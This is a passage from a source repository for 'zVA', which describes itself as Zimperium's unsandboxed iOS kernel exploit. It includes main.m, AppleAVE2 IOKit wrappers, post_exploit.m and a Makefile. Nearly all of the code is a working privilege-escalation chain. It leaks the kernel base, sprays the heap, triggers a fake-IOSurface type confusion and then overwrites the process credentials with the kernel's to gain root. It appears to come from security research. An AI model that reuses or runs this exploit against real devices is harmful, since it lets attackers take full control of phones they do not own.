decoding_table[data[i++]]; 79 | uint32_t sextet_c = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]]; 80 | uint32_t sextet_d = data[i] == '=' ? 0 & i++ : decoding_table[data[i++]]; 81 | #pragma clang diagnostic pop 82 | 83 | uint32_t triple = (sextet_a << 3 * 6) 84 | + (sextet_b << 2 * 6) 85 | + (sextet_c << 1 * 6) 86 | + (sextet_d << 0 * 6); 87 | 88 | if (j < *output_length) decoded_data[j++] = (triple >> 2 * 8) & 0xFF; 89 | if (j < *output_length) decoded_data[j++] = (triple >> 1 * 8) & 0xFF; 90 | if (j < *output_length) decoded_data[j++] = (triple >> 0 * 8) & 0xFF; 91 | } 92 | 93 | return decoded_data; 94 | } 95 | 96 | 97 | /* 98 | * Function name: utils_get_base64_payload 99 | * Description: Encodes the buffer to base64. 100 | * Returns: char * as the encoded buffer, or NULL on failure. 101 | */ 102 | 103 | char * utils_get_base64_payload(void * buffer, size_t length) { 104 | 105 | size_t output_size = 0; 106 | char * result = NULL; 107 | build_decoding_table(); 108 | 109 | result = base64_encode(buffer, length, &output_size); 110 | base64_cleanup(); 111 | 112 | return result; 113 | } 114 | 115 | -------------------------------------------------------------------------------- /main.m: -------------------------------------------------------------------------------- 1 | #include "log.h" 2 | #include "kernel_read.h" 3 | #include "apple_ave_pwn.h" 4 | #include "offsets.h" 5 | #include "heap_spray.h" 6 | //#include "dbg.h" 7 | #include "iosurface_utils.h" 8 | #include "rwx.h" 9 | #include "post_exploit.h" 10 | 11 | #define KERNEL_MAGIC (0xfeedfacf) 12 | 13 | /* 14 | * Function name: print_welcome_message 15 | * Description: Prints a welcome message. Includes credits. 16 | * Returns: void. 17 | */ 18 | 19 | static 20 | void print_welcome_message() { 21 | kern_return_t ret = KERN_SUCCESS; 22 | DEBUG_LOG("Welcome to zVA! Zimperium's unsandboxed kernel exploit"); 23 | DEBUG_LOG("Credit goes to:"); 24 | DEBUG_LOG("\tAdam Donenfeld (@doadam) for heap info leak, kernel base leak, type confusion vuln and exploit."); 25 | } 26 | 27 | 28 | 29 | /* 30 | * Function name: initialize_iokit_connections 31 | * Description: Creates all the necessary IOKit objects for the exploitation. 32 | * Returns: kern_return_t. 33 | */ 34 | 35 | static 36 | kern_return_t initialize_iokit_connections() { 37 | 38 | kern_return_t ret = KERN_SUCCESS; 39 | 40 | ret = apple_ave_pwn_init(); 41 | if (KERN_SUCCESS != ret) 42 | { 43 | ERROR_LOG("Error initializing AppleAVE pwn"); 44 | goto cleanup; 45 | } 46 | 47 | ret = kernel_read_init(); 48 | if (KERN_SUCCESS != ret) 49 | { 50 | ERROR_LOG("Error initializing kernel read"); 51 | goto cleanup; 52 | } 53 | 54 | cleanup: 55 | if (KERN_SUCCESS != ret) 56 | { 57 | kernel_read_cleanup(); 58 | apple_ave_pwn_cleanup(); 59 | } 60 | return ret; 61 | } 62 | 63 | 64 | /* 65 | * Function name: cleanup_iokit 66 | * Description: Cleans up IOKit resources. 67 | * Returns: kern_return_t. 68 | */ 69 | 70 | static 71 | kern_return_t cleanup_iokit() { 72 | 73 | kern_return_t ret = KERN_SUCCESS; 74 | kernel_read_cleanup(); 75 | apple_ave_pwn_cleanup(); 76 | 77 | return ret; 78 | } 79 | 80 | 81 | /* 82 | * Function name: test_rw_and_get_root 83 | * Description: Tests our RW capabilities, then overwrites our credentials so we are root. 84 | * Returns: kern_return_t. 85 | */ 86 | 87 | static 88 | kern_return_t test_rw_and_get_root() { 89 | 90 | kern_return_t ret = KERN_SUCCESS; 91 | uint64_t kernel_magic = 0; 92 | 93 | ret = rwx_read(offsets_get_kernel_base(), &kernel_magic, 4); 94 | if (KERN_SUCCESS != ret || KERNEL_MAGIC != kernel_magic) 95 | { 96 | ERROR_LOG("error reading kernel magic"); 97 | if (KERN_SUCCESS == ret) 98 | { 99 | ret = KERN_FAILURE; 100 | } 101 | goto cleanup; 102 | } else { 103 | DEBUG_LOG("kernel magic: %x", (uint32_t)kernel_magic); 104 | } 105 | 106 | ret = post_exploit_get_kernel_creds(); 107 | if (KERN_SUCCESS != ret || getuid()) 108 | { 109 | ERROR_LOG("error getting root"); 110 | if (KERN_SUCCESS == ret) 111 | { 112 | ret = KERN_NO_ACCESS; 113 | } 114 | goto cleanup; 115 | } 116 | 117 | cleanup: 118 | return ret; 119 | } 120 | 121 | 122 | 123 | 124 | int main(int argc, char const *argv[]) 125 | { 126 | #pragma unused(argc) 127 | #pragma unused(argv) 128 | kern_return_t ret = KERN_SUCCESS; 129 | void * kernel_base = NULL; 130 | void * kernel_spray_address = NULL; 131 | 132 | print_welcome_message(); 133 | 134 | system("id"); 135 | 136 | ret = offsets_init(); 137 | if (KERN_SUCCESS != ret) 138 | { 139 | ERROR_LOG("Error initializing offsets for current device."); 140 | goto cleanup; 141 | } 142 | 143 | ret = initialize_iokit_connections(); 144 | if (KERN_SUCCESS != ret) 145 | { 146 | ERROR_LOG("Error initializing IOKit connections!"); 147 | goto cleanup; 148 | } 149 | 150 | ret = heap_spray_init(); 151 | if (KERN_SUCCESS != ret) 152 | { 153 | ERROR_LOG("Error initializing heap spray"); 154 | goto cleanup; 155 | } 156 | 157 | ret = kernel_read_leak_kernel_base(&kernel_base); 158 | if (KERN_SUCCESS != ret) 159 | { 160 | ERROR_LOG("Error leaking kernel base"); 161 | goto cleanup; 162 | } 163 | 164 | DEBUG_LOG("Kernel base: %p", kernel_base); 165 | 166 | offsets_set_kernel_base(kernel_base); 167 | 168 | ret = heap_spray_start_spraying(&kernel_spray_address); 169 | if (KERN_SUCCESS != ret) 170 | { 171 | ERROR_LOG("Error spraying heap"); 172 | goto cleanup; 173 | } 174 | 175 | ret = apple_ave_pwn_use_fake_iosurface(kernel_spray_address); 176 | if (KERN_SUCCESS != kIOReturnError) 177 | { 178 | ERROR_LOG("Error using fake IOSurface... we should be dead by here."); 179 | } else { 180 | DEBUG_LOG("We're still alive and the fake surface was used"); 181 | } 182 | 183 | ret = test_rw_and_get_root(); 184 | if (KERN_SUCCESS != ret) 185 | { 186 | ERROR_LOG("error getting root"); 187 | goto cleanup; 188 | } 189 | 190 | system("id"); 191 | 192 | 193 | cleanup: 194 | cleanup_iokit(); 195 | heap_spray_cleanup(); 196 | return ret; 197 | } 198 | -------------------------------------------------------------------------------- /log.m: -------------------------------------------------------------------------------- 1 | /* This is a placeholder for the log.h file, so the compiler won't cry. 2 | 3 | 4 | 5 | `.-..:+sss+:. 6 | `+yhddddddmmmmmds:` 7 | `-/hmdddmdmdddmmdmmmddho/-` 8 | -hddmmmdddddddddmmdddddmdmmdo` 9 | `dddddmmmdddmdddddmdddddmdddmd+ 10 | omddddmNmdddmddddmmddmdmmdddmmd. 11 | -/ydmmmdmmmNNmddNmddmmddmmmmmmmmmmo 12 | /hdddddmmmmmNNNmmmNmmmNmmNmNmmmmmmmm/ 13 | .dddddddmmmmmmddddddhhhhhhhhhhhmmNNNmd` 14 | -mmmmmNmho/:::::::-------------/hNNmmm+ 15 | -dmmmmy/------------------------:hmmddh. 16 | `smmms---------------------------/dddddo 17 | .mmm:---------------------------:smdddy 18 | `dmd-----------------------------/ddddh` 19 | dmd-----------------------------:ddddd. 20 | ymh-----------------------------/mdddd. 21 | +ms-----------------------------:ydddy 22 | .ds--+syyysso/-----/oyyhhhhhs+::/+mmm+. 23 | `dmdsososssssyhy+/+odhysooo+//+odmmmNs-:: 24 | -yNm:--:+oyyo+:sMNNNo::o+yyso/--/N++m:-:+ 25 | ::om---::-:::/:sm/-oh-::--------:d::d:--+ 26 | `/+m:---------:do---+s----------o/::d::-/ 27 | -/ss+/::::/+os:-----:o+o+++++++/--:s--/. 28 | /+--::///::/--------::-----------+/-:- 29 | /---------:::----::/:--:-------+h::. 30 | .o---:ssyyyyyo+/oyyhhhhyss:--:syy` 31 | so:-+hhys+++oooo+////+yhh+--syho 32 | :hs/-ys+yo```.......-s+oy+:oyyh- 33 | oyy/oy--::-......--::-syssyyhs 34 | `oyysy/--://::///+:--+yyyyyhy. 35 | `/yyyy+::ossssss+::+yyyyyhy- 36 | -shhysssyyyyyysssyhhyyhs. 37 | `+hhyyyyyyyyyyyyyhhhs/: 38 | .syhhyhhhhhyyyhdhs/--s:` 39 | `:ss-/shddmdddhhy+/----dds:` 40 | -osss---:/+++++//::-----+dsso- 41 | `.+sssss-----::::::::-------hssss/` 42 | `.-:/+syyyysss------:::::--------:hssosy+.`` 43 | `..:/+oossoyyyyyhyss:------------------+yssssssyoo+/-.`` 44 | `.:/+ossssssssyssyssshhys/:-----------------hsyhhhhhyyysssyso+/-.` 45 | -osssosssosssossooysosyhhss+:---------------/yshyyssyssssoossssssso+:` 46 | -sssysssssssssssssoyssssyhhyso:-------------/ssysssssssssyssyssssssssso/` 47 | .sssoysssssssssosssoysssssssyhhy:----------/ossysossosssssssossossssssssss. 48 | ossssysosssssssossoossosssssssshh/-------:osossyssyssssssssssssoossosssssss. 49 | :ssysyysssysssssssyssysssssssssssyh+-----/ssyyhyssossosyssssssssssyyssysyssss` 50 | `sssyshysssssssssssssoysosssssssosssy+---ossyhysssssssoossosssssssossoosyyssss+ 51 | /soshshysosssosssossoossosssosssossosy:-syyssysssssssssssyssysssssssssoshssssos- 52 | `yssshyhysssysssssssyssysssssssssssyssyyyysssossoossssssossoossossssssssydysyssss 53 | /ssssyyyhsssssssssossoossosssssssossossysssssssyssysssssssssossoossosssshhhossooy: 54 | 55 | 56 | */ -------------------------------------------------------------------------------- /apple_ave_utils.m: -------------------------------------------------------------------------------- 1 | #include "apple_ave_utils.h" 2 | #include "iokit.h" 3 | #include "log.h" 4 | #include "iosurface_utils.h" 5 | 6 | 7 | 8 | /* 9 | * Function name: apple_ave_utils_get_connection 10 | * Description: Establishes a new connection to an AppleAVE2DriverUserClient object. 11 | * Returns: kern_return_t and the connection as an output parameter. 12 | */ 13 | 14 | kern_return_t apple_ave_utils_get_connection(io_connect_t * conn_out) { 15 | kern_return_t ret = KERN_SUCCESS; 16 | io_connect_t connection = 0; 17 | mach_port_t master_port = 0; 18 | io_iterator_t itr = 0; 19 | io_service_t service = 0; 20 | io_name_t service_name; 21 | 22 | ret = host_get_io_master(mach_host_self(), &master_port); 23 | if (KERN_SUCCESS != ret) 24 | { 25 | ERROR_LOG("Failed getting master port"); 26 | goto cleanup; 27 | } 28 | 29 | ret = IOServiceGetMatchingServices(master_port, IOServiceMatching(IOKIT_ALL_SERVICES), &itr); 30 | if (KERN_SUCCESS != ret) 31 | { 32 | ERROR_LOG("Failed getting matching services"); 33 | goto cleanup; 34 | } 35 | 36 | while(IOIteratorIsValid(itr) && (service = IOIteratorNext(itr))) { 37 | 38 | ret = IORegistryEntryGetName(service, service_name); 39 | if (KERN_SUCCESS != ret) 40 | { 41 | ERROR_LOG("Error retrieving name"); 42 | continue; 43 | } 44 | 45 | if (strcmp(service_name, IOKIT_SERVICE_APPLE_AVE_NAME)) 46 | { 47 | continue; 48 | } 49 | 50 | ret = IOServiceOpen(service, mach_task_self(), 0, &connection); 51 | if (KERN_SUCCESS != ret) 52 | { 53 | ERROR_LOG("Error opening service %s", service_name); 54 | continue; 55 | } 56 | 57 | break; 58 | } 59 | 60 | if (0 == connection) 61 | { 62 | ERROR_LOG("Service %s not found!", IOKIT_SERVICE_APPLE_AVE_NAME); 63 | ret = KERN_ABORTED; 64 | } 65 | 66 | cleanup: 67 | 68 | if (KERN_SUCCESS == ret) 69 | { 70 | *conn_out = connection; 71 | } 72 | 73 | if (itr) 74 | { 75 | itr = 0; 76 | } 77 | 78 | return ret; 79 | 80 | } 81 | 82 | 83 | 84 | /* 85 | * Function name: apple_ave_utils_add_client 86 | * Description: Adds a client to something. Needed to crash. 87 | * Returns: kern_return_t from the IOKit call. 88 | */ 89 | 90 | kern_return_t apple_ave_utils_add_client(io_connect_t conn) { 91 | kern_return_t ret = KERN_SUCCESS; 92 | char input_buffer[IOKIT_ADD_CLIENT_INPUT_BUFFER_SIZE] = {0}; 93 | size_t output_buffer_size = IOKIT_ADD_CLIENT_OUTPUT_BUFFER_SIZE; 94 | char output_buffer[output_buffer_size]; 95 | 96 | memset(output_buffer, 0, output_buffer_size); 97 | 98 | ret = IOConnectCallMethod(conn, 99 | APPLEAVE2_EXTERNAL_METHOD_ADD_CLIENT, 100 | NULL, 0, 101 | input_buffer, sizeof(input_buffer), 102 | NULL, 0, 103 | output_buffer, &output_buffer_size); 104 | 105 | return ret; 106 | } 107 | 108 | 109 | /* 110 | * Function name: apple_ave_utils_remove_client 111 | * Description: Removes a client... from being added to something. 112 | * Returns: kern_return_t from the IOKit call. 113 | */ 114 | 115 | kern_return_t apple_ave_utils_remove_client(io_connect_t conn) { 116 | kern_return_t ret = KERN_SUCCESS; 117 | char input_buffer[IOKIT_REMOVE_CLIENT_INPUT_BUFFER_SIZE] = {0}; 118 | size_t output_buffer_size = IOKIT_REMOVE_CLIENT_OUTPUT_BUFFER_SIZE; 119 | char output_buffer[output_buffer_size]; 120 | 121 | memset(output_buffer, 0, output_buffer_size); 122 | 123 | ret = IOConnectCallMethod(conn, 124 | APPLEAVE2_EXTERNAL_METHOD_REMOVE_CLIENT, 125 | NULL, 0, 126 | input_buffer, sizeof(input_buffer), 127 | NULL, 0, 128 | output_buffer, &output_buffer_size); 129 | 130 | return ret; 131 | } 132 | 133 | 134 | /* 135 | * Function name: apple_ave_utils_encode_frame 136 | * Description: Wrapper for the EncodeFrame external method. 137 | * Returns: kern_return_t. 138 | */ 139 | 140 | kern_return_t apple_ave_utils_encode_frame(io_connect_t conn, void * input_buffer, 141 | void * output_buffer) { 142 | 143 | kern_return_t ret = KERN_SUCCESS; 144 | size_t output_buffer_size = IOKIT_ENCODE_FRAME_OUTPUT_BUFFER_SIZE; 145 | 146 | ret = IOConnectCallMethod(conn, 147 | APPLEAVE2_EXTERNAL_METHOD_ENCODE_FRAME, 148 | NULL, 0, 149 | input_buffer, IOKIT_ENCODE_FRAME_INPUT_BUFFER_SIZE, 150 | NULL, 0, 151 | output_buffer, &output_buffer_size); 152 | 153 | return ret; 154 | } 155 | 156 | 157 | 158 | 159 | /* 160 | * Function name: apple_ave_utils_prepare_to_encode_frames 161 | * Description: Wrapper for the PrepareToEncodeFrames external method. 162 | * Returns: kern_return_t and output buffer as an output parameter. 163 | */ 164 | 165 | kern_return_t apple_ave_utils_prepare_to_encode_frames(io_connect_t conn, void * input_buffer, 166 | void * output_buffer) { 167 | 168 | kern_return_t ret = KERN_SUCCESS; 169 | size_t output_buffer_size = ENCODE_FRAME_OUTPUT_BUFFER_SIZE; 170 | 171 | ret = IOConnectCallMethod(conn, 172 | APPLEAVE2_EXTERNAL_METHOD_PREPARE_TO_ENCODE_FRAMES, 173 | NULL, 0, 174 | input_buffer, ENCODE_FRAME_INPUT_BUFFER_SIZE, 175 | NULL, 0, 176 | output_buffer, &output_buffer_size); 177 | 178 | 179 | return ret; 180 | } 181 | 182 | /* 183 | * Function name: apple_ave_utils_set_session_settings 184 | * Description: Sets the session settings for the AVE client. 185 | * Returns: kern_return_t. 186 | */ 187 | 188 | kern_return_t apple_ave_utils_set_session_settings(io_connect_t conn, void * input_buffer, void * output_buffer) { 189 | 190 | kern_return_t ret = KERN_SUCCESS; 191 | char output_buffer_local[ENCODE_FRAME_OUTPUT_BUFFER_SIZE] = {0}; 192 | size_t output_buffer_size = sizeof(output_buffer_local); 193 | 194 | 195 | ret = IOConnectCallMethod(conn, 196 | APPLEAVE2_EXTERNAL_METHOD_SET_SESSION_SETTINGS, 197 | NULL, 0, 198 | input_buffer, ENCODE_FRAME_INPUT_BUFFER_SIZE, 199 | NULL, 0, 200 | output_buffer_local, &output_buffer_size); 201 | 202 | if (output_buffer && KERN_SUCCESS == ret) 203 | { 204 | memcpy(output_buffer, output_buffer_local, sizeof(output_buffer_local)); 205 | } 206 | 207 | return ret; 208 | } 209 | 210 | -------------------------------------------------------------------------------- /post_exploit.m: -------------------------------------------------------------------------------- 1 | #include "post_exploit.h" 2 | #include "log.h" 3 | #include "offsets.h" 4 | #include "rwx.h" 5 | 6 | #include 7 | #define MAX_PROCESSES_IN_SYSTEM (0xffff) 8 | 9 | /* 10 | * Function name: post_exploit_set_cred_for_all_threads 11 | * Description: Overwrites the creds of all the threads belonging to the same proc. 12 | * Returns: kern_return_t. 13 | */ 14 | 15 | static 16 | kern_return_t post_exploit_set_cred_for_all_threads(void * thread, void * creds) { 17 | 18 | kern_return_t ret = KERN_SUCCESS; 19 | void * thread_next = NULL; 20 | if (0 != thread) 21 | { 22 | do { 23 | /* update thread's cred */ 24 | ret = rwx_write(thread + OFFSET(struct_uthread_uu_ucred), &creds, sizeof(creds)); 25 | if (KERN_SUCCESS != ret) 26 | { 27 | ERROR_LOG(" Error replacing credentials for thread!"); 28 | goto cleanup; 29 | } else { 30 | DEBUG_LOG(" Replaced credentials for thread"); 31 | } 32 | 33 | ret = rwx_read(thread + OFFSET(struct_uthread_uu_list), &thread_next, sizeof(thread_next)); 34 | if (KERN_SUCCESS != ret) 35 | { 36 | ERROR_LOG(" Failed reading next thread!"); 37 | goto cleanup; 38 | } else { 39 | DEBUG_LOG("next thread: %p", (void*)thread_next); 40 | } 41 | 42 | thread = thread_next; 43 | 44 | }while(0 != thread_next); 45 | } 46 | 47 | cleanup: 48 | return ret; 49 | } 50 | 51 | 52 | 53 | /* 54 | * Function name: post_exploit_copy_cred 55 | * Description: Copies the credentials from one proc to another. 56 | * Returns: kern_return_t. 57 | */ 58 | 59 | static 60 | kern_return_t post_exploit_copy_cred(void * proc_from, void * proc_to) { 61 | 62 | kern_return_t ret = KERN_SUCCESS; 63 | unsigned long creds_from = 0; 64 | unsigned long new_credentials_refcount = 0x444444; 65 | unsigned long uthread = 0; 66 | 67 | ret = rwx_read(proc_from + OFFSET(struct_proc_p_ucred), &creds_from, sizeof(creds_from)); 68 | if (KERN_SUCCESS != ret) 69 | { 70 | ERROR_LOG(" Error reading STRUCT_PROC_P_UCRED_OFFSET"); 71 | } else { 72 | DEBUG_LOG(" kernel_creds: %p", (void*)creds_from); 73 | } 74 | 75 | DEBUG_LOG(" leaking kernel creds' refcount..."); 76 | 77 | /* leak creds */ 78 | ret = rwx_write((void*)(creds_from + OFFSET(struct_kauth_cred_cr_ref)), &new_credentials_refcount, sizeof(new_credentials_refcount)); 79 | if (KERN_SUCCESS != ret) 80 | { 81 | ERROR_LOG(" Error leaking credentials!"); 82 | goto cleanup; 83 | } else { 84 | DEBUG_LOG(" Successfully leaked credentials!"); 85 | } 86 | 87 | DEBUG_LOG(" replacing credentials..."); 88 | 89 | /* replace proc_to's credentials pointer with proc_from's credentials pointer */ 90 | ret = rwx_write(proc_to + OFFSET(struct_proc_p_ucred), &creds_from, sizeof(creds_from)); 91 | if (KERN_SUCCESS != ret) 92 | { 93 | ERROR_LOG(" Error replacing credentials!"); 94 | goto cleanup; 95 | } else { 96 | DEBUG_LOG(" Successfully replaced credentials!"); 97 | } 98 | 99 | DEBUG_LOG(" replacing cached credentials..."); 100 | 101 | /* replace cached credentials */ 102 | ret = rwx_read(proc_to + OFFSET(struct_proc_p_uthlist), &uthread, sizeof(uthread)); 103 | if (KERN_SUCCESS != ret) 104 | { 105 | ERROR_LOG(" Error reading thread list"); 106 | goto cleanup; 107 | } else { 108 | DEBUG_LOG(" uthread: %p", (void*)uthread); 109 | } 110 | 111 | ret = post_exploit_set_cred_for_all_threads((void*)uthread, (void*)creds_from); 112 | 113 | cleanup: 114 | return ret; 115 | } 116 | 117 | 118 | 119 | /* 120 | * Function name: post_exploit_find_proc 121 | * Description: Finds the 'proc' of the process name proc_name. 122 | * Returns: kern_return_t and proc in output params. 123 | */ 124 | 125 | static 126 | kern_return_t post_exploit_find_proc(const char * proc_name, void ** proc_out) { 127 | 128 | kern_return_t ret = KERN_SUCCESS; 129 | unsigned long proc = 0, next_proc = 0; 130 | unsigned int i = 0; 131 | char current_proc_name[16] = {0}; 132 | ret = rwx_read((void*)(offsets_get_kernel_base() + OFFSET(all_proc)), &proc, sizeof(proc)); 133 | if (KERN_SUCCESS != ret) 134 | { 135 | ERROR_LOG("error reading allproc"); 136 | } 137 | else { 138 | DEBUG_LOG("allproc: %p", (void*)proc); 139 | } 140 | 141 | for(i = 0; i < MAX_PROCESSES_IN_SYSTEM; ++i) { 142 | memset(current_proc_name, 0, sizeof(current_proc_name)); 143 | 144 | ret = rwx_read((void*)(proc + OFFSET(struct_proc_p_comm)), current_proc_name, sizeof(current_proc_name)); 145 | if (KERN_SUCCESS != ret) 146 | { 147 | ERROR_LOG("failed reading process name %d", i); 148 | goto cleanup; 149 | } 150 | 151 | DEBUG_LOG("Iterating process name: %s", current_proc_name); 152 | 153 | if (strstr(current_proc_name, proc_name)) 154 | { 155 | *proc_out = (void*)proc; 156 | goto cleanup; 157 | } 158 | 159 | ret = rwx_read((void*)proc, &next_proc, sizeof(next_proc)); 160 | if (KERN_SUCCESS != ret) 161 | { 162 | ERROR_LOG(" error reading next_proc"); 163 | goto cleanup; 164 | } 165 | 166 | proc = next_proc; 167 | } 168 | 169 | cleanup: 170 | return ret; 171 | 172 | } 173 | 174 | 175 | 176 | /* 177 | * Function name: post_exploit_get_kernel_creds 178 | * Description: Updates the credentials of the current process to the kernel's credentials. 179 | * Returns: kern_return_t. 180 | */ 181 | 182 | kern_return_t post_exploit_get_kernel_creds() { 183 | 184 | kern_return_t ret = KERN_SUCCESS; 185 | void * kern_proc = NULL; 186 | void * self_proc = NULL; 187 | 188 | ret = rwx_read(offsets_get_kernel_base() + OFFSET(kern_proc), (unsigned long*)&kern_proc, sizeof(kern_proc)); 189 | if (KERN_SUCCESS != ret) 190 | { 191 | ERROR_LOG("error reading kern_proc"); 192 | goto cleanup; 193 | } 194 | 195 | DEBUG_LOG("kern_proc: %p", kern_proc); 196 | 197 | ret = post_exploit_find_proc(getprogname(), &self_proc); 198 | if (KERN_SUCCESS != ret) 199 | { 200 | ERROR_LOG("error getting self proc"); 201 | goto cleanup; 202 | } 203 | 204 | DEBUG_LOG("self_proc: %p", self_proc); 205 | 206 | ret = post_exploit_copy_cred(kern_proc, self_proc); 207 | if (KERN_SUCCESS != ret) 208 | { 209 | ERROR_LOG("error copying creds from kernel to us"); 210 | goto cleanup; 211 | } 212 | 213 | cleanup: 214 | return ret; 215 | } 216 | 217 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | #### PROJECT SETTINGS #### 3 | # The name of the executable to be created 4 | BIN_NAME := ziva 5 | # Compiler used 6 | CXX ?= clang 7 | # Extension of source files used in the project 8 | SRC_EXT = m 9 | # Path to the source directory, relative to the makefile 10 | SRC_PATH = . 11 | # Space-separated pkg-config libraries used by this project 12 | LIBS = 13 | # sysroot path, for Darwin only 14 | SYSROOT = /Applications/Xcode.app/Contents/Developer/Platforms/iPhoneOS.platform/Developer/SDKs/iPhoneOS.sdk/ 15 | # General compiler flags 16 | COMPILE_FLAGS = -Wall -Wextra -DCOMPILE_AS_CMDLINE -fvisibility=hidden -g -target arm64-apple-darwin9 17 | # Additional release-specific flags 18 | RCOMPILE_FLAGS = -D NDEBUG 19 | # Additional debug-specific flags 20 | DCOMPILE_FLAGS = -D DEBUG 21 | # Add additional include paths 22 | INCLUDES = -I $(SRC_PATH) 23 | # General linker settings 24 | LINK_FLAGS = -target arm64-apple-darwin9 -stdlib=libc++ -framework Foundation -framework IOKit 25 | # Additional release-specific linker settings 26 | RLINK_FLAGS = 27 | # Additional debug-specific linker settings 28 | DLINK_FLAGS = 29 | # Destination directory, like a jail or mounted system 30 | DESTDIR = / 31 | # Install path (bin/ is appended automatically) 32 | INSTALL_PREFIX = usr/local 33 | #### END PROJECT SETTINGS #### 34 | 35 | # Generally should not need to edit below this line 36 | 37 | # Obtains the OS type, either 'Darwin' (OS X) or 'Linux' 38 | UNAME_S:=$(shell uname -s) 39 | 40 | # Function used to check variables. Use on the command line: 41 | # make print-VARNAME 42 | # Useful for debugging and adding features 43 | print-%: ; @echo $*=$($*) 44 | 45 | # Shell used in this makefile 46 | # bash is used for 'echo -en' 47 | SHELL = /bin/bash 48 | # Clear built-in rules 49 | .SUFFIXES: 50 | # Programs for installation 51 | INSTALL = install 52 | INSTALL_PROGRAM = $(INSTALL) 53 | INSTALL_DATA = $(INSTALL) -m 644 54 | 55 | # Append pkg-config specific libraries if need be 56 | ifneq ($(LIBS),) 57 | COMPILE_FLAGS += $(shell pkg-config --cflags $(LIBS)) 58 | LINK_FLAGS += $(shell pkg-config --libs $(LIBS)) 59 | endif 60 | 61 | # Append sysroot 62 | ifneq ($(SYSROOT),) 63 | COMPILE_FLAGS += -isysroot $(SYSROOT) 64 | LINK_FLAGS += -isysroot $(SYSROOT) 65 | endif 66 | 67 | # Verbose option, to output compile and link commands 68 | export V := false 69 | export CMD_PREFIX := @ 70 | ifeq ($(V),true) 71 | CMD_PREFIX := 72 | endif 73 | 74 | # Combine compiler and linker flags 75 | release: export CXXFLAGS := $(CXXFLAGS) $(COMPILE_FLAGS) $(RCOMPILE_FLAGS) 76 | release: export LDFLAGS := $(LDFLAGS) $(LINK_FLAGS) $(RLINK_FLAGS) 77 | debug: export CXXFLAGS := $(CXXFLAGS) $(COMPILE_FLAGS) $(DCOMPILE_FLAGS) 78 | debug: export LDFLAGS := $(LDFLAGS) $(LINK_FLAGS) $(DLINK_FLAGS) 79 | 80 | # Build and output paths 81 | release: export BUILD_PATH := build/release 82 | release: export BIN_PATH := bin/release 83 | debug: export BUILD_PATH := build/debug 84 | debug: export BIN_PATH := bin/debug 85 | install: export BIN_PATH := bin/release 86 | 87 | # Find all source files in the source directory, sorted by most 88 | # recently modified 89 | ifeq ($(UNAME_S),Darwin) 90 | SOURCES = $(shell find $(SRC_PATH) -name '*.$(SRC_EXT)' | sort -k 1nr | cut -f2-) 91 | else 92 | SOURCES = $(shell find $(SRC_PATH) -name '*.$(SRC_EXT)' -printf '%T@\t%p\n' \ 93 | | sort -k 1nr | cut -f2-) 94 | endif 95 | 96 | # fallback in case the above fails 97 | rwildcard = $(foreach d, $(wildcard $1*), $(call rwildcard,$d/,$2) \ 98 | $(filter $(subst *,%,$2), $d)) 99 | ifeq ($(SOURCES),) 100 | SOURCES := $(call rwildcard, $(SRC_PATH), *.$(SRC_EXT)) 101 | endif 102 | 103 | # Set the object file names, with the source directory stripped 104 | # from the path, and the build path prepended in its place 105 | OBJECTS = $(SOURCES:$(SRC_PATH)/%.$(SRC_EXT)=$(BUILD_PATH)/%.o) 106 | # Set the dependency files that will be used to add header dependencies 107 | DEPS = $(OBJECTS:.o=.d) 108 | 109 | # Macros for timing compilation 110 | ifeq ($(UNAME_S),Darwin) 111 | CUR_TIME = awk 'BEGIN{srand(); print srand()}' 112 | TIME_FILE = $(dir $@).$(notdir $@)_time 113 | START_TIME = $(CUR_TIME) > $(TIME_FILE) 114 | END_TIME = read st < $(TIME_FILE) ; \ 115 | $(RM) $(TIME_FILE) ; \ 116 | st=$$((`$(CUR_TIME)` - $$st)) ; \ 117 | echo $$st 118 | else 119 | TIME_FILE = $(dir $@).$(notdir $@)_time 120 | START_TIME = date '+%s' > $(TIME_FILE) 121 | END_TIME = read st < $(TIME_FILE) ; \ 122 | $(RM) $(TIME_FILE) ; \ 123 | st=$$((`date '+%s'` - $$st - 86400)) ; \ 124 | echo `date -u -d @$$st '+%H:%M:%S'` 125 | endif 126 | 127 | # Version macros 128 | # Comment/remove this section to remove versioning 129 | USE_VERSION := false 130 | # If this isn't a git repo or the repo has no tags, git describe will return non-zero 131 | 132 | # Standard, non-optimized release build 133 | .PHONY: release 134 | release: dirs 135 | ifeq ($(USE_VERSION), true) 136 | @echo "Beginning release build v$(VERSION_STRING)" 137 | else 138 | @echo "Beginning release build" 139 | endif 140 | @$(START_TIME) 141 | @$(MAKE) all --no-print-directory 142 | @echo -n "Total build time: " 143 | @$(END_TIME) 144 | 145 | # Debug build for gdb debugging 146 | .PHONY: debug 147 | debug: dirs 148 | ifeq ($(USE_VERSION), true) 149 | @echo "Beginning debug build v$(VERSION_STRING)" 150 | else 151 | @echo "Beginning debug build" 152 | endif 153 | @$(START_TIME) 154 | @$(MAKE) all --no-print-directory 155 | @echo -n "Total build time: " 156 | @$(END_TIME) 157 | 158 | # Create the directories used in the build 159 | .PHONY: dirs 160 | dirs: 161 | @echo "Creating directories" 162 | @mkdir -p $(dir $(OBJECTS)) 163 | @mkdir -p $(BIN_PATH) 164 | 165 | # Installs to the set path 166 | .PHONY: install 167 | install: 168 | @echo "Installing to $(DESTDIR)$(INSTALL_PREFIX)/bin" 169 | @$(INSTALL_PROGRAM) $(BIN_PATH)/$(BIN_NAME) $(DESTDIR)$(INSTALL_PREFIX)/bin 170 | 171 | # Uninstalls the program 172 | .PHONY: uninstall 173 | uninstall: 174 | @echo "Removing $(DESTDIR)$(INSTALL_PREFIX)/bin/$(BIN_NAME)" 175 | @$(RM) $(DESTDIR)$(INSTALL_PREFIX)/bin/$(BIN_NAME) 176 | 177 | # Removes all build files 178 | .PHONY: clean 179 | clean: 180 | @echo "Deleting $(BIN_NAME) symlink" 181 | @$(RM) $(BIN_NAME) 182 | @echo "Deleting directories" 183 | @$(RM) -r build 184 | @$(RM) -r bin 185 | 186 | # Main rule, checks the executable and symlinks to the output 187 | all: $(BIN_PATH)/$(BIN_NAME) 188 | @echo "Making symlink: $(BIN_NAME) -> $<" 189 | @$(RM) $(BIN_NAME) 190 | @ln -s $(BIN_PATH)/$(BIN_NAME) $(BIN_NAME) 191 | 192 | 193 | # Link the executable 194 | $(BIN_PATH)/$(BIN_NAME): $(OBJECTS) 195 | @echo "Linking: $@" 196 | @$(START_TIME) 197 | $(CMD_PREFIX)$(CXX) $(OBJECTS) 